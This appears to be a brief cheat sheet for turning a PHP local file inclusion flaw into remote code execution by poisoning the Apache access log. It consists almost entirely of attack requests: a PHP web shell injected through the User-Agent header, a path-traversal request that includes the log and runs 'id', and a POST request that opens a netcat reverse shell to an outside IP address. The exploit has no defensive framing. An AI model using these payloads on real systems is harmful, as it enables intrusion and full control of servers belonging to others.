Skip to content

PHP LFI with RCE

Put RCE into log

GET / HTTP/1.1
Host: 11.22.33.44
User-Agent: MozillaHacked<pre><?php echo shell_exec($_REQUEST['cmd']) ?></pre>

RCE - POC

GET http://$IP/index.php?file=../../../../../../../../var/log/apache2/access.log&cmd=id

RCE

POST /index.php?file=../../../../../../../../var/log/apache2/access.log HTTP/1.1
Host: 192.168.240.72:8593
Content-Type: application/x-www-form-urlencoded

cmd=netcat 55.66.77.88 4444 -e /bin/bash